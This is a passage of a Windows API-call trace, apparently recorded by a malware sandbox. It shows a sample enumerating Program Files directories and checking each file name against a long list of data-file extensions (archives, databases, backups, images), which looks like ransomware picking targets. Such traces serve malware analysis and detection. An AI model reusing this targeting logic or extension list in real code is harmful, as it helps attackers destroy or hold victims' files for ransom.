ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xeccb8639, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="pref", cAlternateFileName="")) returned 0 [0320.210] FindClose (in: hFindFile=0x3947fe8 | out: hFindFile=0x3947fe8) returned 1 [0320.210] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0320.210] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec0a647c, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xec0a647c, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x4504b780, ftLastWriteTime.dwHighDateTime=0x1d31ce2, nFileSizeHigh=0x0, nFileSizeLow=0x1ee, dwReserved0=0x0, dwReserved1=0x0, cFileName="dependentlibs.list", cAlternateFileName="DEPEND~1.LIS")) returned 1 [0320.210] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0320.210] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec0cc6d9, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xec0cc6d9, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x767d8300, ftLastWriteTime.dwHighDateTime=0x1d31ce2, nFileSizeHigh=0x0, nFileSizeLow=0x7cdd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="firefox.exe", cAlternateFileName="")) returned 1 [0320.211] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0320.211] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec118bb8, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xec118bb8, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x77aeb000, ftLastWriteTime.dwHighDateTime=0x1d31ce2, nFileSizeHigh=0x0, nFileSizeLow=0x383, dwReserved0=0x0, dwReserved1=0x0, cFileName="freebl3.chk", cAlternateFileName="")) returned 1 [0320.211] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0320.211] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xecaee98b, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xecb87321, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xecb87321, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="0.1", cAlternateFileName="")) returned 0 [0320.211] FindClose (in: hFindFile=0x3947fe8 | out: hFindFile=0x3947fe8) returned 1 [0320.212] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0320.212] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec13ee02, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xec13ee02, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x78dfdd00, ftLastWriteTime.dwHighDateTime=0x1d31ce2, nFileSizeHigh=0x0, nFileSizeLow=0x139d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IA2Marshal.dll", cAlternateFileName="IA2MAR~1.DLL")) returned 1 [0320.213] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0320.213] FindNextFileW (in: hFindFile=0x3947d68, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec629cf8, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xec629cf8, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xdde50400, ftLastWriteTime.dwHighDateTime=0x1d31cdd, nFileSizeHigh=0x0, nFileSizeLow=0x84, dwReserved0=0x0, dwReserved1=0x0, cFileName="update-settings.ini", cAlternateFileName="UPDATE~1.INI")) returned 1 [0320.214] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0320.216] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe79312f8, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0xeba10cbe, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeba10cbe, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0320.217] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0320.217] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe79312f8, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0xe795770f, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe795770f, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0320.218] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4036fe8 | out: hHeap=0x470000) returned 1 [0320.218] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe79312f8, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0xe795770f, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe795770f, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0 [0320.218] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0320.218] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0320.218] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe79312f8, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0xe79312f8, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe79312f8, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Windows Workflow Foundation", cAlternateFileName="WINDOW~1")) returned 0 [0320.218] FindClose (in: hFindFile=0x3947c28 | out: hFindFile=0x3947c28) returned 1 [0320.218] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0320.218] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea4c20e0, ftCreationTime.dwHighDateTime=0x1d5ecae, ftLastAccessTime.dwLowDateTime=0x2efde530, ftLastAccessTime.dwHighDateTime=0x1d568dd, ftLastWriteTime.dwLowDateTime=0x2efde530, ftLastWriteTime.dwHighDateTime=0x1d568dd, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="webdrive.exe", cAlternateFileName="")) returned 1 [0320.219] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0320.221] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe795770f, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0xe795770f, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe795770f, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0320.617] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0320.617] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9093563c, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6df28692, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0x6df4e8ff, ftLastWriteTime.dwHighDateTime=0x1d327be, nFileSizeHigh=0x0, nFileSizeLow=0x63000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="System.IdentityModel.dll", cAlternateFileName="")) returned 1 [0320.618] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0320.618] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe79a3b1b, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0xe79effb3, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe79effb3, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 1 [0320.619] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x40a7ef8 | out: hHeap=0x470000) returned 1 [0320.619] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8f08c | out: lpFindFileData=0x2e8f08c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51ee72a2, ftCreationTime.dwHighDateTime=0x1d327be, ftLastAccessTime.dwLowDateTime=0x51ee72a2, ftLastAccessTime.dwHighDateTime=0x1d327be, ftLastWriteTime.dwLowDateTime=0x84d80300, ftLastWriteTime.dwHighDateTime=0x1d2837f, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="System.AddIn.Contract.dll", cAlternateFileName="")) returned 1 [0320.620] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4097ef0 | out: hHeap=0x470000) returned 1 [0320.620] FindNextFileW (in: hFindFile=0x3948228, lpFindFileData=0x2e8f308 | out: lpFindFileData=0x2e8f308*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe79a3b1b, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0xe79effb3, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe79effb3, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5", cAlternateFileName="")) returned 0 [0320.621] FindClose (in: hFindFile=0x3948228 | out: hFindFile=0x3948228) returned 1 [0320.621] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4057ed0 | out: hHeap=0x470000) returned 1 [0320.621] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f584 | out: lpFindFileData=0x2e8f584*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe795770f, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0xe79a3b1b, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe79a3b1b, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="Framework", cAlternateFileName="FRAMEW~1")) returned 0 [0320.621] FindClose (in: hFindFile=0x3947fe8 | out: hFindFile=0x3947fe8) returned 1 [0320.621] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0320.624] FindNextFileW (in: hFindFile=0x3948168, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe795770f, ftCreationTime.dwHighDateTime=0x1d5d810, ftLastAccessTime.dwLowDateTime=0xe795770f, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xe795770f, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0320.624] FindClose (in: hFindFile=0x3948168 | out: hFindFile=0x3948168) returned 1 [0320.624] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0320.624] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x59f2f4b4, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xe859ba08, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe859ba08, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="rempl", cAlternateFileName="")) returned 1 [0320.627] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4025f98 | out: hHeap=0x470000) returned 1 [0320.627] FindNextFileW (in: hFindFile=0x3947fe8, lpFindFileData=0x2e8f800 | out: lpFindFileData=0x2e8f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xda970d0, ftCreationTime.dwHighDateTime=0x1d5ebf9, ftLastAccessTime.dwLowDateTime=0x3e9c4460, ftLastAccessTime.dwHighDateTime=0x1d58b0a, ftLastWriteTime.dwLowDateTime=0x3e9c4460, ftLastWriteTime.dwHighDateTime=0x1d58b0a, nFileSizeHigh=0x0, nFileSizeLow=0x13200, dwReserved0=0x0, dwReserved1=0x0, cFileName="nights_attending_other.exe", cAlternateFileName="NIGHTS~1.EXE")) returned 1 [0320.627] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0320.627] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xd2709a20, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xeaca7979, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xeaca7979, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0320.628] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x54cee8 | out: hHeap=0x470000) returned 1 [0320.628] FindNextFileW (in: hFindFile=0x39480a8, lpFindFileData=0x2e8fa7c | out: lpFindFileData=0x2e8fa7c*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x4c509d45, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xea72415a, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xea72415a, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="UNP", cAlternateFileName="")) returned 1 [0321.581] FindNextFileW (in: hFindFile=0x39485a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e2fdd51, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa76f9fe7, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e32400a, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0321.581] FindNextFileW (in: hFindFile=0x39485a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2fdd51, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e2fdd51, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x32e4c500, ftLastWriteTime.dwHighDateTime=0x1d3225e, nFileSizeHigh=0x0, nFileSizeLow=0xb5b9, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="index.html", cAlternateFileName="INDEX~1.HTM")) returned 1 [0321.582] FindNextFileW (in: hFindFile=0x39485a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2fdd51, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e2fdd51, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x3b8f4c00, ftLastWriteTime.dwHighDateTime=0x1d29f07, nFileSizeHigh=0x0, nFileSizeLow=0x258, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="toastbeginupgrade.xml", cAlternateFileName="TOASTB~1.XML")) returned 1 [0321.582] FindNextFileW (in: hFindFile=0x39485a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2fdd51, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e2fdd51, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x6e978800, ftLastWriteTime.dwHighDateTime=0x1d2d919, nFileSizeHigh=0x0, nFileSizeLow=0x19f, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="toastbeginupgradeth2.xml", cAlternateFileName="TOASTB~2.XML")) returned 1 [0321.582] FindNextFileW (in: hFindFile=0x39485a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e32400a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e32400a, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x4c4a7800, ftLastWriteTime.dwHighDateTime=0x1d2db6e, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="toastreviewsettings.xml", cAlternateFileName="TOASTR~1.XML")) returned 1 [0321.582] FindNextFileW (in: hFindFile=0x39485a8, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e32400a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e32400a, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x4c4a7800, ftLastWriteTime.dwHighDateTime=0x1d2db6e, nFileSizeHigh=0x0, nFileSizeLow=0x1d6, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="toastreviewsettings.xml", cAlternateFileName="TOASTR~1.XML")) returned 0 [0321.582] FindClose (in: hFindFile=0x39485a8 | out: hFindFile=0x39485a8) returned 1 [0321.592] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4162fe8 | out: hHeap=0x470000) returned 1 [0321.592] FindNextFileW (in: hFindFile=0x3947c28, lpFindFileData=0x2e8ee10 | out: lpFindFileData=0x2e8ee10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e32400a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa772ddc0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e32400a, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0321.594] FindFirstFileW (in: lpFileName="C:\\Program Files\\UNP\\CampaignManager\\Campaigns\\{91be532c-f9f1-406a-9858-43697c6f437a}\\Content1\\bg-BG\\*", lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e32400a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa772ddc0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e32400a, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x3948768 [0321.600] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8e32400a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0xa772ddc0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x8e32400a, ftLastWriteTime.dwHighDateTime=0x1d32723, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0321.600] FindNextFileW (in: hFindFile=0x3948768, lpFindFileData=0x2e8eb94 | out: lpFindFileData=0x2e8eb94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e32400a, ftCreationTime.dwHighDateTime=0x1d32723, ftLastAccessTime.dwLowDateTime=0x8e32400a, ftLastAccessTime.dwHighDateTime=0x1d32723, ftLastWriteTime.dwLowDateTime=0x32e4c500, ftLastWriteTime.dwHighDateTime=0x1d3225e, nFileSizeHigh=0x0, nFileSizeLow=0xd556, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="index.html", cAlternateFileName="INDEX~1.HTM")) returned 1 [0321.600] lstrlenW (lpString="index.html") returned 10 [0321.600] lstrlenW (lpString=".1cd") returned 4 [0321.600] lstrcmpiW (lpString1=".1cd", lpString2="html") returned -1 [0321.600] lstrlenW (lpString=".3ds") returned 4 [0321.600] lstrcmpiW (lpString1=".3ds", lpString2="html") returned -1 [0321.600] lstrlenW (lpString=".3fr") returned 4 [0321.600] lstrcmpiW (lpString1=".3fr", lpString2="html") returned -1 [0321.600] lstrlenW (lpString=".3g2") returned 4 [0321.600] lstrcmpiW (lpString1=".3g2", lpString2="html") returned -1 [0321.600] lstrlenW (lpString=".3gp") returned 4 [0321.600] lstrcmpiW (lpString1=".3gp", lpString2="html") returned -1 [0321.601] lstrlenW (lpString=".7z") returned 3 [0321.601] lstrcmpiW (lpString1=".7z", lpString2="tml") returned -1 [0321.601] lstrlenW (lpString=".accda") returned 6 [0321.601] lstrcmpiW (lpString1=".accda", lpString2="x.html") returned -1 [0321.601] lstrlenW (lpString=".accdb") returned 6 [0321.601] lstrcmpiW (lpString1=".accdb", lpString2="x.html") returned -1 [0321.601] lstrlenW (lpString=".accdc") returned 6 [0321.601] lstrcmpiW (lpString1=".accdc", lpString2="x.html") returned -1 [0321.601] lstrlenW (lpString=".accde") returned 6 [0321.601] lstrcmpiW (lpString1=".accde", lpString2="x.html") returned -1 [0321.601] lstrlenW (lpString=".accdt") returned 6 [0321.601] lstrcmpiW (lpString1=".accdt", lpString2="x.html") returned -1 [0321.601] lstrlenW (lpString=".accdw") returned 6 [0321.601] lstrcmpiW (lpString1=".accdw", lpString2="x.html") returned -1 [0321.601] lstrlenW (lpString=".adb") returned 4 [0321.601] lstrcmpiW (lpString1=".adb", lpString2="html") returned -1 [0321.601] lstrlenW (lpString=".adp") returned 4 [0321.601] lstrcmpiW (lpString1=".adp", lpString2="html") returned -1 [0321.601] lstrlenW (lpString=".ai") returned 3 [0321.602] lstrcmpiW (lpString1=".ai", lpString2="tml") returned -1 [0321.602] lstrlenW (lpString=".ai3") returned 4 [0321.602] lstrcmpiW (lpString1=".ai3", lpString2="html") returned -1 [0321.602] lstrlenW (lpString=".ai4") returned 4 [0321.602] lstrcmpiW (lpString1=".ai4", lpString2="html") returned -1 [0321.602] lstrlenW (lpString=".ai5") returned 4 [0321.602] lstrcmpiW (lpString1=".ai5", lpString2="html") returned -1 [0321.602] lstrlenW (lpString=".ai6") returned 4 [0321.602] lstrcmpiW (lpString1=".ai6", lpString2="html") returned -1 [0321.602] lstrlenW (lpString=".ai7") returned 4 [0321.602] lstrcmpiW (lpString1=".ai7", lpString2="html") returned -1 [0321.602] lstrlenW (lpString=".ai8") returned 4 [0321.602] lstrcmpiW (lpString1=".ai8", lpString2="html") returned -1 [0321.602] lstrlenW (lpString=".anim") returned 5 [0321.602] lstrcmpiW (lpString1=".anim", lpString2=".html") returned -1 [0321.602] lstrlenW (lpString=".arw") returned 4 [0321.602] lstrcmpiW (lpString1=".arw", lpString2="html") returned -1 [0321.602] lstrlenW (lpString=".as") returned 3 [0321.603] lstrcmpiW (lpString1=".as", lpString2="tml") returned -1 [0321.603] lstrlenW (lpString=".asa") returned 4 [0321.603] lstrcmpiW (lpString1=".asa", lpString2="html") returned -1 [0321.603] lstrlenW (lpString=".asc") returned 4 [0321.603] lstrcmpiW (lpString1=".asc", lpString2="html") returned -1 [0321.603] lstrlenW (lpString=".ascx") returned 5 [0321.603] lstrcmpiW (lpString1=".ascx", lpString2=".html") returned -1 [0321.603] lstrlenW (lpString=".asm") returned 4 [0321.603] lstrcmpiW (lpString1=".asm", lpString2="html") returned -1 [0321.603] lstrlenW (lpString=".asmx") returned 5 [0321.604] lstrcmpiW (lpString1=".asmx", lpString2=".html") returned -1 [0321.604] lstrlenW (lpString=".asp") returned 4 [0321.604] lstrcmpiW (lpString1=".asp", lpString2="html") returned -1 [0321.604] lstrlenW (lpString=".aspx") returned 5 [0321.604] lstrcmpiW (lpString1=".aspx", lpString2=".html") returned -1 [0321.604] lstrlenW (lpString=".asr") returned 4 [0321.604] lstrcmpiW (lpString1=".asr", lpString2="html") returned -1 [0321.604] lstrlenW (lpString=".asx") returned 4 [0321.604] lstrcmpiW (lpString1=".asx", lpString2="html") returned -1 [0321.604] lstrlenW (lpString=".avi") returned 4 [0321.604] lstrcmpiW (lpString1=".avi", lpString2="html") returned -1 [0321.604] lstrlenW (lpString=".avs") returned 4 [0321.604] lstrcmpiW (lpString1=".avs", lpString2="html") returned -1 [0321.604] lstrlenW (lpString=".backup") returned 7 [0321.604] lstrcmpiW (lpString1=".backup", lpString2="ex.html") returned -1 [0321.604] lstrlenW (lpString=".bak") returned 4 [0321.604] lstrcmpiW (lpString1=".bak", lpString2="html") returned -1 [0321.604] lstrlenW (lpString=".bay") returned 4 [0321.604] lstrcmpiW (lpString1=".bay", lpString2="html") returned -1 [0321.604] lstrlenW (lpString=".bd") returned 3 [0321.604] lstrcmpiW (lpString1=".bd", lpString2="tml") returned -1 [0321.604] lstrlenW (lpString=".bin") returned 4 [0321.604] lstrcmpiW (lpString1=".bin", lpString2="html") returned -1 [0321.605] lstrlenW (lpString=".bmp") returned 4 [0321.605] lstrcmpiW (lpString1=".bmp", lpString2="html") returned 